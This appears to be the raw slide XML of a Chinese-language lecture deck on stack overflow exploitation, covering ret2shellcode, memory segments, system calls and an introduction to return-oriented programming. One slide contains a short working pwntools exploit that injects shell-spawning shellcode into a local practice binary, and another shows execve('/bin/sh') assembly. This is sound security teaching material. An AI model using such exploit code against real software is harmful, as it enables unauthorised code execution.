          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="482891" y="3658751"/>
            <a:ext cx="3904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将栈上数据拷贝到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BSS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段</a:t>
            </a:r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FB361A98-32B5-5E93-CE65-30D6E5DFAD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692" y="4553333"/>
            <a:ext cx="5532599" cy="57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22008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6F542C06-4F84-45F8-A155-C9C1CA996953}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6631568" y="305873"/>
            <a:ext cx="3883024" cy="6246254"/>
            <a:chOff x="4584874" y="992499"/>
            <a:chExt cx="5738974" cy="5601480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="Shape 624">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A8DC2CD-6D8B-473D-BD39-E56AFEDCFDC5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4584874" y="992499"/>
              <a:ext cx="5738973" cy="5601480"/>
              <a:chOff x="4897549" y="888136"/>
              <a:chExt cx="1363201" cy="3620439"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Shape 625">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{529DE509-C2E4-44BB-8BE6-C481AF3FA52E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="888136"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>For Kernel</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Shape 626">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F13D3A9-59E1-48B7-B88F-AFA6E52583E9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1162336"/>
                <a:ext cx="1363200" cy="532702"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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" name="Shape 627">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9D023FC-2D0D-4160-AE9D-3A16DB1F7623}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1695037"/>
                <a:ext cx="1363200" cy="345399"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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" name="Shape 628">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EC5BF3E-1C26-460D-BF4F-9870124E7288}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2040436"/>
                <a:ext cx="1363200" cy="442800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shared libraries</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="Shape 629">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F78A3CD3-E481-4F8E-BA23-04776A31C3E4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2483236"/>
                <a:ext cx="1363200" cy="410861"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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Shape 630">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3C36562-15E1-44F3-A275-54744B61749F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2894098"/>
                <a:ext cx="1363200" cy="274195"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="D9EAD3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dirty="0"/>
                  <a:t>Heap</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Shape 631">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6286BDDF-878B-4830-8C97-41E0EAD0356C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897549" y="3681759"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="F4CCCC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dirty="0"/>
                  <a:t>Data</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Shape 632">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9282ED0-348A-430C-9614-46B78381CB83}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3957664"/>
                <a:ext cx="1363200" cy="276712"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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dirty="0"/>
                  <a:t>Text</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="Shape 633">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D40C47C8-3847-4696-ACE1-0EAF89E09DA4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="4234375"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Unused</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="15" name="Shape 634">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FDAEC4A-0225-4A8A-BE4B-B55D902BD42D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="8" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5579150" y="1695037"/>
                <a:ext cx="0" cy="109299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16" name="Shape 635">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B83DCF5A-918C-4F83-A5BF-9C91701057AB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="11" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="5579150" y="2559899"/>
                <a:ext cx="4460" cy="334199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</p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Shape 631">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E991AC80-276A-4219-AB15-7858AE929F7C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4584879" y="1844876"/>
              <a:ext cx="5738969" cy="251142"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E4808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zh-CN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ret_addr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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= </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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shellcode_addr</a:t>
              </a:r>
              <a:endParaRPr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17" name="文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687AF02C-0789-432C-A9DB-7FED09A1EB89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10672628" y="924113"/>
            <a:ext cx="858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Stack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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9A27E8BD-EE3F-4447-9D68-66DAEB5233CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10760237" y="4556015"/>
            <a:ext cx="683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Bss</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="连接符: 肘形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22E0522E-454E-4538-B2E5-F09C06D10F87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="1"/>
            <a:endCxn id="21" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6631567" y="1396390"/>
            <a:ext cx="4" cy="3388932"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5715100000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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hape 628">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{402A0AF2-2DF5-4833-A710-9AE68DA39E2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631570" y="4241794"/>
            <a:ext cx="3883021" cy="88090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" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B214794-FBBA-4945-A292-0508CF388B3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631567" y="4645297"/>
            <a:ext cx="3883021" cy="280050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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shellcode we input</a:t>
            </a:r>
            <a:endParaRPr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6FC4DA90-B1DB-4350-B58E-A948D3187F02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215442" y="1995953"/>
            <a:ext cx="361074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from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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pwn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import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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io = process("./ret2shellcode")</a:t>
            </a:r>
          </a:p>
          <a:p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buf2 = 0x0804A080</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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en-US" altLang="zh-CN" dirty="0" err="1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io.recv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()</a:t>
            </a:r>
          </a:p>
          <a:p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payload = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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asm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(shellcraft.sh()).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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ljust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(112, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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b'A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') + p32(buf2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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io.sendline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(payload)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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io.interactive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()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5D428442-E10F-4CA8-8CF0-A41520AFB679}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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栈溢出基础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| ret2shellcode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EBB726A-30E0-CB92-16A8-475030D132F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068470" y="1513333"/>
            <a:ext cx="3904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跳转到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buf2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执行写入的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shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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6037961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FB6555C-3E05-4F34-871D-1DA28E079374}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1883229"/>
            <a:ext cx="12192000" cy="4974771"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="25000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx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62D3185-EEB2-4471-B209-5E958373A434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="527342" y="387927"/>
            <a:ext cx="908909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7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Part</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="7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返回导向编程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C43481F-3B3B-4D80-AE04-A8383F14E9A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2491840" y="2766155"/>
            <a:ext cx="773083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ret2syscall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动态链接过程 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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ret2libc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其它的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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ROP</a:t>
            </a:r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技巧</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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9351353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A9441375-0C44-49B3-ADBA-65BA3243996D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1621003" y="1923871"/>
            <a:ext cx="828143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操作系统提供给用户的编程接口</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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是提供访问操作系统所管理的底层硬件的接口</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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本质上是一些内核函数代码，以规范的方式驱动硬件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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x86 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通过 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int 0x80 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指令进行系统调用、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amd64 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通过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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syscall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指令进行系统调用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 817">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{773BB1B4-2241-44A2-A2A8-44BCA1128992}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088700" y="1144517"/>
            <a:ext cx="2670924" cy="584775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什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2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系统调用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？</a:t>
            </a:r>
            <a:endParaRPr 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Shape 817">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26DE6005-05DC-4A14-9ED1-089CABF818B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088700" y="3532117"/>
            <a:ext cx="2670924" cy="584775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举例</a:t>
            </a:r>
            <a:endParaRPr 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F43FCBD-5841-4354-92CA-E1BC6CDB204B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1621003" y="4184471"/>
            <a:ext cx="9085885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my_puts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() -&gt; write() -&gt; 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sys_write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()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my_puts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(“Hello world!”);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	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程序 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ELF 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中的用户代码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		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write(1, &amp;”Hello world!”, 12);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CN" dirty="0" err="1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libc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中的用户代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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[ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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eax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= 4; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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ebx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= 1; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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ecx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= &amp;”Hello world!”; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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edx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= 12; ] + int 0x80; =&gt; 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sys_write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()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Linux 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内核中的内核代码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ABA1564-7487-44BF-937B-A7C8E2C4412B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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ret2syscall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="106342270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817">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9360013-6EB5-4ED1-B251-B05527C21559}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631204" y="2231780"/>
            <a:ext cx="5235900" cy="3033783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可是在程序中没有已存在的一段代码是：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sz="18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	mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1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eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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, 0xb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="18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	mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1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ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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, [“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1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sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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”] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="18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	mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1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ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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, 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="18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	mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1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edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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, 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="18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	int 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="18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	=&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1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execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="18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("/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1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sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="18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",NULL,NULL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="18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我们仍然要执行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1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execve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("/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1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sh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",NULL,NULL)</a:t>
            </a:r>
          </a:p>
          <a:p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该怎么做呢？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Shape 817">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74A54133-4A71-41CF-9D5D-ECBB04E00DA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1642068"/>
            <a:ext cx="2061028" cy="589712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Shape 817">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E73E88F5-2219-4A18-B3D0-F0035F80B09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5867104" y="2536581"/>
            <a:ext cx="6455396" cy="220052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7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eturn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>riented </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rogramming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3200" dirty="0">
                <a:latin typeface="华文隶书" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文隶书" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>返回导向编程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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12" name="Shape 817">
